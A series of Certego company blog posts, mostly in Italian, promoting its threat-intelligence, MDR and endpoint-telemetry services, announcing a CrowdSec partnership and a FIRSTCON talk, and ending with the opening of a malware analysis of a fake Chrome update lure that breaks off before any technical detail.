Per migliorare le performance degli nostri IOC proprietari e quelli di terze parti, in Certego abbiamo sviluppato un ecosistema applicativo proprietario di Threat Intelligence che raccoglie, classifica, analizza e condivide i dati di intelligence sulle minacce informatiche 24 ore su 24.

Threat Intelligence focalizzata sul mercato italiano

A differenza degli IOC di fonti internazionali, quelli di Certego sono classificati per le specifiche esigenze delle aziende italiane.

Grazie alla visibilità su oltre 200 clienti e al dislocamento di honeypot proprietari su infrastrutture italiane, Certego trasforma i dati di intelligence in informazioni azionabili, applicabili in tempo reale alle blocklist dei firewall e nei sistemi di monitoraggio e analisi in uso agli analisti per rilevare e bloccare gli attacchi emergenti a cui le aziende italiane sono più esposte.

Tempestività: Gli IOC vengono integrati in tempo reale nelle regole dei firewall e nei sistemi di monitoraggio, consentendo di bloccare le minacce emergenti con maggiore rapidità ed efficacia, riducendo i falsi positivi. Consentono agli analisti di condurre analisi più accurate e approfondite, sfruttando informazioni aggiornate in tempo reale.
Precisione: Sono accuratamente verificati e aggiornati per garantire elevati standard di affidabilità, aiutando i firewall ad eseguire più blocchi e gli analisti a svolgere indagini più approfondite
Rilevanza: Offrono un contesto ricco, con dettagli sulla fonte, le metodologie e sul potenziale impatto.

Esempio pratico: Potenziamento dei Firewall

Prendiamo in esame due casi pratici reali per analizzare come l’applicazione degli IOC di Certego abbia contribuito a incrementare i blocchi dei firewall di due aziende clienti:

Azienda Enterprise settore Finance:
l’integrazione degli IOC di Certego sui firewall ha portato a un incremento del +10% dei blocchi dei firewall. In una settimana, sono stati bloccati 20 milioni di tentativi di connessione da indirizzi IP classificati come malevoli da parte di Certego.

Azienda Enterprise settore Manufacturing:
l’integrazione degli IOC di Certego sui firewall ha portato a un incremento del +21% dei blocchi dei firewall. In una settimana, sono stati bloccati 12 milioni di tentativi di connessione provenienti da IP identificati come pericolosi da Certego.

Questi risultati dimostrano come l'adozione degli IOC possa potenziare le difese aziendali contro le minacce emergenti, riducendo i rischi e ottimizzando il carico di lavoro dei team di sicurezza. Grazie al miglioramento del rilevamento e del blocco automatico da parte dei firewall, gli analisti sono chiamati a gestire un numero inferiore di incidenti, permettendo loro di concentrarsi su attività strategiche di analisi e risposta più mirata

Esempio pratico: Analisi più Avanzate

Gli analisti di sicurezza possono trarre grandi vantaggi dall'uso degli IOC (Indicatori di Compromissione), soprattutto quando questi sono integrati con strumenti avanzati di gestione della sicurezza, come la nostra piattaforma di Unified Security Operations, PanOptikon®.

Gli IOC aiutano a migliorare la precisione e la velocità di rilevamento, oltre a ridurre i tempi di risposta agli incidenti.

Supponiamo che gli analisti di Certego rilevino un file sospetto sulla rete di una azienda cliente. Gli IOC, come ad file hash unici e IP, possono essere rapidamente consultati grazie all’ecosistema proprietario di Threat Intelligence che collega l'hash a una campagna di attacchi già nota.

Grazie a questa correlazione con attacchi precedentemente analizzati, gli analisti non solo identificano la tipologia di attacco in questione, ma possono anche accedere a informazioni dettagliate sulle tecniche, tattiche e procedure (TTP) utilizzate dal gruppo di attacco.

Queste informazioni permettono al team di bloccare l'attacco più velocemente, aggiornando rapidamente le regole del firewall e isolando le macchine compromesse.

Inoltre, la presenza di IOC correlati può segnalare altri attacchi simili che potrebbero essere stati lanciati contemporaneamente, consentendo una risposta più ampia e preventiva.

In questo modo, gli IOC aiutano a bloccare più velocemente non solo l'attacco attuale, ma anche a prevenire eventuali tentativi futuri collegati.

Gli esempi pratici discussi dimostrano chiaramente come l'uso degli IOC possa potenziare sia le difese proattive, ottimizzando i firewall, sia le capacità di risposta rapida degli analisti. L'adozione di questi strumenti consente alle organizzazioni di essere più preparate a fronteggiare minacce sempre più sofisticate, riducendo tempi di reazione e prevenendo efficacemente attacchi futuri.

Unified Security Operations Platform

Pier Giorgio Bergonzi, Product Marketing — Tue, 17 Sep 2024 22:00:00 GMT

Immagina la sicurezza della tua azienda come un'orchestra, dove ogni musicista suona il proprio strumento. Se manca un direttore d'orchestra il risultato può essere caotico, nonostante l'impegno di ogni singolo elemento. Allo stesso modo, nel mondo della cybersecurity, ogni strumento di sicurezza, se agisce in modo isolato, rischia di non garantire la protezione adeguata.

Una piattaforma di Unified Security Operations funge da direttore d'orchestra, coordinando centralmente le attività di MDR (Managed Detection and Response) e Cyber Risk Monitoring.

Fornisce una visione completa e continua degli asset IT, come endpoint, reti e cloud. Il suo compito è aggregare, arricchire e analizzare i dati provenienti da queste diverse fonti, trasformandoli in informazioni utili per mantenere i sistemi di difesa sempre aggiornati, rilevare le minacce di ultima generazione e rispondere agli incidenti in maniera più agile e rapida.

L’obiettivo principale è elevare il monitoraggio della sicurezza a un nuovo livello, unificando i vari aspetti della cybersecurity in un'unica piattaforma. Grazie a questa visione centralizzata, ogni componente dell'infrastruttura aziendale viene costantemente monitorata e protetta attraverso un'unica soluzione, assicurando una risposta proattiva e tempestiva agli incidenti 24/7, migliorando così l'efficienza operativa e la sicurezza complessiva dell'organizzazione.

L’approccio alla cybersecurity di Certego si basa su PanOptikon®, la nostra piattaforma proprietaria di Unified Security Operations progettata per erogare servizi MDR personalizzati e scalabili.

In questo articolo, analizziamo quali sono i principali vantaggi di affidarsi a un servizio MDR basato su una piattaforma di Unified Security Operations, in grado di garantire una protezione proattiva per la tua azienda.

1. Visibilità centralizzata degli asset IT

La piattaforma PanOptikon® consente di aggrega i dati provenienti da rete, endpoint, cloud e strumenti di gestione delle vulnerabilità, offrendo una visione centralizzata e completa delle attività di sicurezza. I team possono analizzare ogni singolo evento attraverso un'unica interfaccia, evitando di passare tra strumenti diversi.

Questa visione unificata è resa possibile dalla visibilità del dato telemetrico degli endpoint e dall'integrazione nativa della funzionalità SIEM (Security Information and Event Management) che consentono di raccogliere, correlare e analizzare in tempo reale i dati provenienti da diverse fonti, garantendo una visione completa dell'ambiente di sicurezza aziendale.

2. Monitoraggio continuo del Cyber Risk

PanOptikon® consente di monitorare costantemente i livelli di sicurezza dell'organizzazione, fornendo una visione chiara e aggiornata del rischio informatico a cui è esposta. Questo approccio proattivo all'ottimizzazione della gestione del rischio offre un quadro completo delle debolezze dell'infrastruttura IT, consentendo interventi rapidi e mirati per mitigare i rischi e rafforzare la protezione aziendale.

3. Rilevamento delle minacce in tempo reale

Grazie alla visibilità avanzata dei dati degli endpoint, reti e cloud, la piattaforma rileva le minacce in tempo reale, correlando ogni singolo evento con le informazioni proprietarie di Threat Intelligence (IOC e BIOC) di Certego che offrono informazioni aggiornate sulle nuove tecniche di attacco e le vulnerabilità emergenti, migliorando la precisione del rilevamento.

La piattaforma consente di implementare regole di rilevamento personalizzate per le singole esigenze di ogni cliente, adattabili alle peculiarità infrastrutturali dell'organizzazione.

4. Riduzione dei tempi di risposta agli incidenti

La visibilità centralizzata degli eventi di security all’interno di un’unica console consente al team di Security Operations di Certego di svolgere analisi più approfondite e rapide, correlando i dati provenienti da diverse fonti per fornire una visione chiara degli incidenti e agire con più dati alla mano.

5. Automazione e orchestrazione avanzata delle attività di cybersecurity

L’automazione è fondamentale per una gestione efficace e scalabile della sicurezza. La piattaforma PanOptikon® integra nativamente la funzione SOAR (Security Orchestration, Automation, and Response) per automatizzare le attività ripetitive e orchestrare processi complessi. Ad esempio, la risposta a minacce più comuni può essere automatizzata, eliminando la necessità di intervento umano per operazioni quali l’isolamento di un endpoint compromesso o l’applicazione di patch di sicurezza.

Queste automazioni non solo accelerano la risposta agli incidenti, ma consentono ai team di security di concentrarsi sulle minacce più complesse e sulle attività più strategiche.

6. Riduzione dei falsi positivi

Un problema comune nella sicurezza informatica è l'elevato volume di allarmi, spesso non critici, che può sovraccaricare i team di lavoro e rallentare la risposta.

PanOptikon® risolve questo problema aggregando gli allarmi correlati in incidenti unici, grazie alla capacità di collegare tra di loro e in maniera automatizzata eventi provenienti da diverse fonti.

Invece di trattare ogni allarme come un'entità separata, la piattaforma raggruppa gli eventi in un singolo incidente, consentendo ai team di concentrarsi su minacce reali e prioritarie, migliorando l'efficienza operativa e riducendo il rischio di affaticamento da falsi positivi.

L'uso dell’analisi comportamentale avanzata e informazioni di Threat Intelligence avanzate aiuta a ridurre i falsi positivi, filtrando attività anomale che non rappresentano una reale minaccia.

7. Collaborazione semplificata

La piattaforma di Unified Security Operations di Certego è progettata per facilitare la collaborazione tra i team di sicurezza, permettendo loro di lavorare in modo più coordinato ed efficiente.

I processi di risposta possono essere orchestrati facilmente grazie a un'interfaccia centralizzata che assegna compiti specifici a diversi team e favorisce la comunicazione tra gli stakeholder.

Il sistema di ticketing integrato nella piattaforma e le notifiche in tempo reale facilitano la comunicazione e la gestione dei compiti di Investigation e Incident Response.

In sintesi, affidarsi ai servizi MDR di Certego, erogati tramite la piattaforma di Unified Security Operations PanOptikon® consente non solo di migliorare le attività di rilevamento e risposta agli incidenti, ma anche di potenziare la visibilità e il controllo della sicurezza aziendale ottimizzando le risorse interne e garantendo una protezione proattiva e scalabile.

Threat Intelligence - Vulnerability insights

Sun, 08 Sep 2024 22:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di agosto 2024, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

Riduzione dei Falsi Positivi

Pier Giorgio Bergonzi, Product Marketing — Tue, 03 Sep 2024 22:00:00 GMT

Nel panorama della cybersecurity, la precisione è fondamentale. Ogni allerta emessa dai sistemi di sicurezza dovrebbe rappresentare una potenziale minaccia da affrontare con tempestività. Tuttavia, la realtà quotidiana per molti professionisti IT è ben diversa. Spesso, gran parte delle risorse è dedicata a gestire i cosiddetti falsi positivi, allarmi che segnalano un problema infondato.

I falsi positivi non sono solo un fastidio; sono un ostacolo significativo per l'efficienza operativa. Ogni allarme falso richiede tempo e attenzione, portando a una dispersione delle risorse e aumentando il rischio che un reale incidente passi inosservato.

In questo articolo, esaminiamo il fenomeno dei falsi positivi nelle attività di rilevamento, mostrando come l’approccio di Certego, basato sulla visibilità dei dati telemetrici, uno stack tecnologico proprietario avanzato e il contributo di Analisti esperti, permette di ridurre drasticamente il numero dei falsi positivi a carico del cliente, migliorando così l'efficacia complessiva dei servizi MDR.

1. Visibilità del Dato Telemetrico

La visibilità dei dati telemetrici degli endpoint costituisce il fondamento della capacità di Certego di migliorare l’individuazione delle minacce e ridurre i falsi positivi per i propri clienti.

Attraverso la tecnologia avanzata della piattaforma Unified Security Operations, PanOptikon®, Certego è in grado di raccogliere, arricchire e analizzare i dati grezzi provenienti dagli endpoint distribuiti nelle infrastrutture dei clienti.

Questo approccio offre un enorme vantaggio rispetto all'affidarsi esclusivamente ai dati generati dalle soluzioni EDR, poiché va oltre la semplice analisi degli allarmi prodotti dagli endpoint. La capacità di Certego di analizzare in profondità ai dati grezzi provenienti dai sensori permette infatti una visibilità più completa dell'attività degli endpoint. Questo garantisce una rilevazione delle minacce più precisa ed efficace, basata sull’arricchimento dei dati grezzi di telemetria.

2. Applicazione delle regole di Threat Detection e Correlazione degli Eventi

Una volta che i dati grezzi degli endpoint vengono raccolti all'interno della piattaforma PanOptikon®, la fase successiva consiste nell’applicare le regole di rilevamento (Threat Detection) di Certego ai dati telemetrici, sfruttando una combinazione di analisi comportamentale e indicatori di compromissione per rilevare vari tipi di minacce di ultima generazione di tipo malware, furto di credenziali, ransomware, etc.

I dati telemetrici, raccolti dai sensori distribuiti sugli endpoint, vengono arricchiti con l’applicazione delle regole di Threat Detection di Certego per identificare attività sospette, come accessi non autorizzati, script dannosi o comportamenti anomali dei processi. In Certego fruttiamo la correlazione multi-evento per collegare queste attività, fornendo una visione completa delle potenziali minacce.

Ad esempio, se la piattaforma PanOptikon® rileva l’esecuzione di PowerShell con un comando codificato o un binario sconosciuto in esecuzione, correla queste azioni con il traffico di rete, la creazione di processi o le modifiche ai file per determinare se il comportamento fa parte di un attacco più ampio.

La correlazione degli eventi è un elemento chiave del processo, poiché consente di collegare tra loro eventi che, presi singolarmente, potrebbero sembrare isolati, ma che, una volta uniti, rivelano una sequenza di attività potenzialmente legate a un attacco complesso. Questo approccio consente di identificare minacce sofisticate che potrebbero sfuggire ai sistemi tradizionali di rilevamento sugli endpoint.

Solo grazie alle attività svolte dai team di Threat Intelligence e Threat Detection di Certego, che studiano quotidianamente le tecniche di attacco emergenti, è possibile sviluppare specifiche regole di rilevamento, applicabili al dato telemetrico, per intercettare minacce di ultima generazione, molto spesso difficili da identificare.

L’analisi multi-step contribuisce inoltre a migliorare l’efficacia del rilevamento riducendo i falsi positivi nelle fasi iniziali. In questo modo, solo le minacce reali vengono segnalate agli Analisti di Certego, consentendo loro di concentrarsi su indagini approfondite e interventi mirati.

3. Analisi degli Allarmi e riduzione dei Falsi Positivi

Una volta che gli eventi sono stati correlati, le correlazioni rilevate all'interno della piattaforma PanOptikon® generano allarmi che segnalano potenziali minacce da sottoporre a un'ulteriore analisi.

Quando viene attivato un allarme sulla piattaforma PanOptikon®, gli Analisti del team di Security Operations di Certego lo classificano in base alla gravità e al rischio. Esaminano ogni allarme sfruttando la visibilità dei dati telemetrici degli endpoint e i dati correlati dall'ecosistema di sicurezza per condurre analisi approfondite. In questa fase, verificano la presenza di attività anomale o indicatori di compromissione (IOC), come comportamenti sospetti dei file, processi insoliti o anomalie nel traffico di rete, per avere una visione completa del contesto dell'allarme.

Una volta confermata la minaccia, gli Analisti prendono le misure necessarie per contenere e neutralizzare l'attacco. Le azioni correttive possono includere l'isolamento dei sistemi compromessi, la rimozione dei file dannosi e il ripristino della sicurezza dell'infrastruttura. Gli Analisti collaborano strettamente con i team di sicurezza interni alle aziende clienti per assicurare che tutte le misure siano tempestive ed efficaci, minimizzando l’impatto sull’organizzazione.

Questo processo accurato e strutturato permette di ridurre significativamente i falsi positivi, assicurando che le risorse vengano utilizzate solo per gestire le minacce reali.

4. Esempio pratico

Esaminiamo un caso concreto relativo a una PMI operante nel settore manifatturiero, che chiameremo Gamma.

Nel corso di un anno, Certego ha elaborato e analizzato 14,6 miliardi di dati telemetrici grezzi provenienti dai sensori endpoint distribuiti nell'infrastruttura aziendale di Gamma.

In seguito all'acquisizione dei dati, la piattaforma PanOptikon® ha applicato automaticamente le regole di rilevamento (Detection Engine) sviluppate dal team di Threat Detection.

Queste regole hanno inizialmente generato oltre 270 mila eventi sospetti, che hanno richiesto un'analisi approfondita. Attraverso l’attività di correlazione, che ha collegato i vari eventi sospetti, PanOptikon® ha ridotto il numero complessivo, generando 14.200 allarmi da sottoporre a ulteriore analisi. A questo punto, gli Analisti del team di Security Operations di Certego sono intervenuti: grazie alla possibilità di condurre analisi dettagliate sui dati telemetrici direttamente all’interno della piattaforma PanOptikon®, hanno ridotto i falsi positivi del 94%, gestendo infine 796 incidenti nel periodo di riferimento.

Infine, ma non per importanza, dei 796 incidenti gestiti solo 6 erano compresi tra un livello di rischio 4 e 5, quello potenzialmente più elevato.

Grazie al servizio di Managed Detection and Response (MDR) di Certego, l'azienda Gamma beneficia di una soluzione avanzata in grado di esaminare in più fasi e in maniera più approfondita gli eventi di cybersecurity, riducendo drasticamente i falsi positivi e ottimizzando i processi interni di gestione degli incidenti.

Certego and CrowdSec

Pier Giorgio Bergonzi, Product Marketing — Sun, 01 Sep 2024 22:00:00 GMT

Since our founding in 2013, Certego’s MDR services have been driven by Threat Intelligence, providing proactive protection backed by high-quality, up-to-date data. This approach allows us to respond swiftly to threats, continuously strengthening our clients’ defenses and delivering adaptive, effective protection in an ever-evolving digital landscape.

Our many initiatives over the years have established Certego’s Threat Intelligence team as a recognized force on the international stage. A notable example is our recent participation in #FIRSTCON24 in Fukuoka, Japan, in June 2024, where we showcased IntelOwl, Certego’s Threat Intelligence Investigation platform, which is integrated within our Unified Security Operations platform, PanOptikon®.

We believe that information sharing and global cooperation are essential for enhancing security. Over the years, we’ve established top-tier international partnerships in the Threat Intelligence field. Today, we are proud to announce a new collaboration with CrowdSec, an international leader in Cyber Threat Intelligence.

"This partnership aims to create a more integrated and effective security ecosystem, leveraging the sharing of Indicators of Compromise (IoC) between the two companies to provide increasingly advanced solutions for protecting infrastructures," says Matteo Lodi, Threat Intelligence Team Leader at Certego.

CrowdSec

CrowdSec is an innovative cybersecurity company that adopts a collaborative, open source approach to protect digital assets from emerging threats.

The CrowdSec Security Engine is designed for SOC and DevSecOps communities, using collective intelligence to proactively detect and mitigate attacks. One of CrowdSec’s key features is its global IP reputation database, supported by over 65,000 active installations and 80,000 active users across more than 190 countries. Each user contributes to this collective intelligence, continuously updating the IP reputation database, resulting in a constantly evolving defense against cyber threats. Threats shared by users are processed using the CrowdSec consensus calculator, ensuring the CTI info is reliable, properly classified, and updated in real time, providing always fresh data. CrowdSec stands out for its ability to prevent intrusions rather than merely reacting to breaches, making it an ideal tool for stopping threats before they can compromise systems.

"The partnership between Certego and CrowdSec combines the reliability of both companies' information and expertise. CrowdSec chose Certego for the high reliability of our IoCs and our solid experience in aggregating and sharing indicators of compromise," adds Matteo Lodi. This collaboration represents a perfect synergy, harnessing the strengths of both companies to deliver advanced defense tools against digital threats.

The collaboration between Certego and CrowdSec will bring significant benefits to both parties and their clients:

For CrowdSec’s clients: Certego’s data, in the form of IoCs, will be directly integrated into CrowdSec’s platform. This will allow clients to access broader, constantly updated, and high-quality Threat Intelligence, enhancing their ability to prevent attacks and safeguard their infrastructures.
For Certego’s analysts: access to IoCs from CrowdSec’s global network will enable Certego to conduct more detailed and accurate investigations. Analysts will be able to leverage this data to improve incident detection and response, increasing the precision of investigative and threat response activities.

The partnership between Certego and CrowdSec unites two companies that share a core value: the reliability of information and collaboration in the fight against cyber threats. Through this strategic partnership, Certego and CrowdSec are at the forefront of cybersecurity, offering increasingly effective and dependable solutions.

Together with CrowdSec, we are working to make the digital world a safer place for all organizations, helping to build a future founded on shared intelligence and collaborative security.

Threat Intelligence - Vulnerability insights

Tue, 13 Aug 2024 22:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di luglio 2024, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

Telemetria degli Endpoint

Pier Giorgio Bergonzi, Product Marketing — Tue, 16 Jul 2024 22:00:00 GMT

L'aumento della sofisticazione delle minacce informatiche ha reso sempre più difficile proteggere in modo affidabile un ambiente IT con le soluzioni di sicurezza tradizionali.

La trasformazione digitale, l'adozione massiccia del cloud e il lavoro ibrido ampliano la gamma di dispositivi endpoint collegati alle reti aziendali, rendendo la loro protezione una sfida enorme per i professionisti IT. La superficie di attacco si è ampliata enormemente e i punti ciechi nelle infrastrutture IT sono un rischio crescente.

La telemetria degli endpoint è diventata vitale in questo contesto, offrendo informazioni in tempo reale sulle attività e sulla postura di sicurezza di questi dispositivi. Senza questi dati, affidandosi unicamente agli avvisi delle tecnologie EDR, le squadre di sicurezza potrebbero non accorgersi di quando e come gli asset chiave vengono compromessi, scoprendo le violazioni solo dopo che un attaccante ha già ottenuto una posizione di vantaggio.

Cos’è la telemetria degli Endpoint?

Nel mondo della cybersecurity si dice: "non puoi proteggere ciò che non puoi vedere". Ed è qui che entra in gioco la telemetria.

La telemetria degli endpoint è il processo di raccolta, trasmissione e analisi di dati grezzi dai dispositivi finali di una rete, come computer, smartphone, tablet e dispositivi IoT.

Questi dati includono informazioni su attività di sistema, utilizzo delle applicazioni, eventi di sicurezza e configurazioni hardware e software, fornendo una visibilità dettagliata e in tempo reale sugli endpoint.

Le fonti di telemetria degli endpoint includono:

Processi di sistema: monitoraggio delle attività dei processi in esecuzione;
Modifiche ai file: registrazione delle modifiche ai file critici;
Cambiamenti del registro: tracciamento delle modifiche al registro di sistema;
Connessioni di rete: analisi delle connessioni di rete per individuare attività sospette.

Avere a disposizione una soluzione tecnologica in grado di aggregare e analizzare i dati grezzi degli endpoint consente alle aziende di essere meglio informate sui potenziali problemi di sicurezza. La raccolta di dati grezzi degli endpoint e l'uso di analisi comportamentali avanzate permettono di esaminare gli eventi in tempo reale, offrendo una visibilità approfondita, la capacità di aggiornare rapidamente i sistemi e rispondere prontamente agli incidenti.

Proviamo a spiegare la telemetria degli endpoint con una analogia…

Immagina di essere un medico responsabile del monitoraggio della salute dei pazienti in un ospedale. Ogni paziente ha esigenze diverse e ogni situazione medica è unica, quindi è essenziale avere una visione completa e continua delle loro condizioni di salute. Durante il ricovero, ogni paziente è collegato a dispositivi medici che monitorano costantemente parametri vitali come la frequenza cardiaca, la pressione sanguigna e la temperatura corporea. Questi dati vengono raccolti in tempo reale e registrati nei sistemi dell'ospedale.

Il monitoraggio della salute non serve solo a tenere sotto osservazione lo stato attuale del paziente, ma anche a fare aggiustamenti informati al trattamento.

Ipotizziamo che un paziente riporti sintomi insoliti durante il ricovero. Senza i dati clinici raccolti durante gli esami , sarebbe difficile determinare la causa del problema. Tuttavia, grazie ai dati raccolti in precedenza, il medico può analizzare i trend e le anomalie che potrebbero aver contribuito ai sintomi. Questo permette di intervenire rapidamente, modificando il trattamento per evitare ulteriori complicazioni.

Proprio come un medico utilizza i dati diagnostici per monitorare e ottimizzare la salute e il trattamento dei suoi pazienti, la telemetria degli endpoint fornisce alle squadre di sicurezza informatica le informazioni necessarie per mantenere la sicurezza e la funzionalità dei sistemi aziendali. La raccolta continua e l'analisi degli eventi permettono di identificare e risolvere problemi in modo proattivo, garantendo che gli endpoint siano sempre protetti.

Vantaggi della telemetria degli Endpoint

La raccolta e l'analisi degli eventi telemetrici degli endpoint permette di identificare e risolvere problemi in modo proattivo:

Minimizzare i punti ciechi di visibilità

Senza la telemetria degli endpoint, alcune attività dannose potrebbero passare inosservate. Riduce i punti ciechi, migliorando la capacità di individuare comportamenti anomali.
Rilevare i comportamenti degli avversari prima

Tecniche come l'abuso di PowerShell e l'iniezione di processi, spesso utilizzate per eseguire attacchi di malware senza file, possono essere individuate solo attraverso un'analisi dettagliata dei dati telemetrici, permettendo ai team di sicurezza di intervenire rapidamente.
Rilevare minacce sconosciute

Il rilevamento delle minacce non deve limitarsi alle minacce conosciute. Applicando gli IoCs e BIoCs sempre aggiornate, l’analisi telemetrica permette di scoprire attività sospette che potrebbero indicare nuove minacce.
Ridurre il numero di falsi positivi

Una telemetria ben analizzata e correttamente correlata permette di filtrare gli allarmi non rilevanti, migliorando l'efficacia dei team di sicurezza e riducendo il tempo dedicato ai falsi allarmi.
Fornire un contesto maggiore

Le rilevazioni basate sulla rete spesso mancano dei dettagli necessari per prendere decisioni rapide e precise. I dati telemetrici degli endpoint consentono indagini forensi più approfondite e risposte più efficaci agli incidenti di sicurezza.
Maggiore precisione dell’Intelligence sulle minacce

Le informazioni ottenute dai dati di telemetria consentono di identificare pattern e trend che migliorano la capacità di rilevare e prevenire futuri attacchi.

L'approccio di Certego alla telemetria degli Endpoint

Per implementare una strategia di cybersecurity che sfrutti i vantaggi della telemetria degli endpoint, è essenziale poter contare su una soluzione tecnologica avanzata.

La piattaforma PanOptikon® di Certego offre strumenti per la visibilità completa dei dati grezzi degli endpoint. Con regole di casi d'uso mappate al MITRE ATT&CK e playbook di risposta automatizzati, PanOptikon® identifica, contiene e interrompe le minacce rapidamente ed efficacemente.

Certego applica la propria threat intelligence ai dati telemetrici, utilizzando Indicatori di Compromissione (IoCs) e Indicatori Comportamentali di Compromissione (BIOCs). Gli IoCs sono segnali specifici di minaccia, come hash di file malevoli, indirizzi IP sospetti o domini di comando e controllo. I BIOCs identificano modelli di comportamento sospetti, o tentativi di iniezione di processi.

Tuttavia, realizzare il valore della telemetria degli endpoint non significa semplicemente installare lo strumento giusto e catturare ogni informazione disponibile. Per ottenere i migliori risultati, è importante comprendere quali dati analizzare, arricchirli adeguatamente e rispondere rapidamente ed efficacemente alle attività dannose rilevate. Combinando professionisti della sicurezza esperti, tecnologia di primo livello e intelligenza sulle minacce, si può accelerare il tempo necessario per rilevare e rispondere agli attacchi più recenti.

Mentre la maggior parte delle integrazioni con le soluzioni Endpoint si concentrano sugli avvisi generati dalla piattaforma, la tecnologia proprietaria di Certego acquisisce sia gli avvisi sia la telemetria grezza generata dai sensori EDR. Questa telemetria viene elaborata e analizzata dalla piattaforma PanOptikon® e dal nostro Security Operations Team per confermare e investigare le minacce, eliminando i falsi positivi.

In Certego, utilizziamo i dati telemetrici degli endpoint in vari modi per migliorare la sicurezza delle reti aziendali. Ecco come lavoriamo con questi dati:

Raccolta e integrazione dei dati:
- Raccolta: Certego raccoglie o dati di telemetria grezza dagli endpoint tramite integrazioni con le soluzioni EDR.
- Integrazione: La telemetria viene trasmessa in tempo reale alla piattaforma PanOptikon®, dove vengono applicate le regole di Threat Intelligence per la correlazione degli eventi.
Analisi e correlazione:
- Certego analizza sia gli avvisi di prodotto degli EDR che la telemetria grezza degli endpoint con il proprio motore di rilevamento. Questo motore utilizza migliaia di casi d'uso di analisi comportamentale per identificare e correlare le minacce.
- Il team di Security Operations di Certego, operativo 24/7, analizza le informazioni correlate per confermare le minacce ed eliminare i falsi positivi.
Gestione degli avvisi:
- Una volta che gli avvisi sono stati correlati e analizzati, la piattaforma PanOptikon® comunica le minacce confermate ai clienti, fornendo loro il contesto necessario per comprendere e rispondere efficacemente agli incidenti di sicurezza. Questo processo aiuta a ridurre il carico di lavoro dei team di sicurezza interni e a migliorare la tempestività delle risposte.
Miglioramento continuo:
- Certego supporta le organizzazioni nella distribuzione, configurazione e aggiornamento delle policy per i sensori EDR. Questo continuo miglioramento e adattamento delle policy garantisce che le misure di sicurezza siano sempre aggiornate e ottimizzate per affrontare le minacce emergenti.

In Certego sfruttiamo la telemetria degli endpoint per fornire una visione completa e in tempo reale delle attività e dello stato di sicurezza dei dispositivi, migliorando la capacità delle organizzazioni di rilevare, analizzare e rispondere alle minacce informatiche.

Threat Intelligence - Vulnerability insights

Tue, 02 Jul 2024 22:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di giugno 2024, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

#FIRSTCON24 Fukuoka

Wed, 26 Jun 2024 22:00:00 GMT

Nei giorni scorsi, una numerosa delegazione di Certego ha partecipato alla trentaseiesima edizione del FIRSTCON, il principale evento internazionale organizzato dal FIRST (global Forum of Incident Response and Security Teams), tenutosi quest’anno a Fukuoka, in Giappone, dal 9 al 14 giugno.

Certego è stata selezionata tra le aziende che hanno partecipato in qualità di speaker alla conferenza: Matteo Lodi, Threat Intelligence Team Leader di Certego, e Simone Berni, Threat Intelligence Engineer di Certego, hanno tenuto un intervento di 50 minuti per presentare alla platea internazionale IntelOwl, la piattaforma di Threat Intelligence di Certego, integrata all’interno della nostra piattaforma di Unified Security Operations, PanOptikon®, che facilita il lavoro quotidiano degli analisti di sicurezza informatica, consentendo loro di risparmiare tempo e aumentare l'efficienza delle operazioni di Detection, Analysis e Incident Response.

IntelOwl, disponibile anche nella sua versione Open Source, si conferma da numerosi anni uno dei principali progetti internazionali nel campo della Cyber Threat Intelligence. Con oltre 3.000 "stars" su GitHub, la piattaforma di Certego ha consolidato la sua reputazione nella community Open Source, in particolare per l'analisi degli indicatori di compromissione (indirizzi IP, domini, hash, file).

Il talk di Certego è stato uno dei più partecipati dell'intera conferenza, con 300 presenze, a dimostrazione del costante interesse verso la nostra soluzione proprietaria, che con le sue numerose release nel corso degli anni ha saputo confermarsi come progetto di punta nel suo campo.

Durante i cinque giorni dell’evento, abbiamo avuto occasione di assistere a diversi talk interessanti che ci hanno fornito spunti di ricerca su tematiche come la sicurezza degli ambienti cloud, l’utilizzo di algoritmi di Intelligenza Artificiale e Machine Learning, l’automazione delle operazioni di risposta agli incidenti, l’approccio Zero Trust e molto altro.

Oltre ad averci dato la possibilità di presentare la nostra soluzione, la conferenza è stata l'occasione per rincontrare amici di lunga data, esperti di cybersecurity e connetterci e scambiare idee con professionisti internazionali della comunità di Incident Responder sulle sfide della sicurezza informatica.

Questa filosofia di cooperazione, che da oltre undici anni rappresenta un tratto distintivo di Certego, non solo arricchisce le nostre competenze e capacità, ma contribuisce anche a consolidare la comunità globale della sicurezza, sviluppando un ecosistema più robusto e resistente alle minacce del cybercrime.

Naturalmente, non abbiamo potuto fare a meno di immergerci nella cultura giapponese, che non stancherà mai di affascinarci, con una passione per il sushi, videogames e ukiyo-e!

Siamo entusiasti all'idea di partecipare alle nuove iniziative del FIRST, dove avremo l'opportunità di condividere le nostre soluzioni proprietarie con esperti internazionali. Questo scambio di conoscenze e innovazioni rafforza ulteriormente il ruolo di Certego come leader nel settore, confermando la nostra unicità e il nostro impegno nell'eccellenza tecnologica.

Malware Analysis

Mon, 10 Jun 2024 22:00:00 GMT

Authors: Luca Testoni, Marco Giovanetti.

Summary

Introduzione
Contesto di riferimento
Strumenti di analisi utilizzati
Analisi effettuate
- 4.1 Kill Chain
- 4.2 Analisi dell'applicazione web
IOCs
TTPs
References

1. Introduzione

Nell’attuale contesto della cybersecurity, è sempre più necessario dotare le infrastrutture aziendali di servizi gestiti per il monitoraggio 24/7.

Questo approccio non è solo una misura di sicurezza, ma una vera e propria necessità per garantire una protezione continua e tempestiva contro le minacce informatiche: la sorveglianza costante permette di rilevare e rispondere rapidamente a qualsiasi attività sospetta, minimizzando i rischi di compromissione e perdita di dati.

2. Contesto di riferimento

Recentemente, il nostro Incident Response Team (IRT) ha affrontato un caso interessante che mette in luce l'importanza del monitoraggio 24/7.

Un attaccante è riuscito a compromettere il portale di un sito web di servizi, inserendo al suo interno un modale ingannevole che cercava di persuadere i visitatori a scaricare un finto aggiornamento del browser Chrome.

La trappola era ben congegnata: una volta che l'utente cliccava per procedere al finto aggiornamento, veniva avviata una catena di attacco (kill chain) che portava all’esecuzione di un malware di tipo infostealer sul client della vittima. Questa tecnica di attacco, nota come "Fake Update"[1], è progettata per rubare informazioni sensibili dall'utente ignaro.

Dettagli del modale malevolo che innesca la kill chain

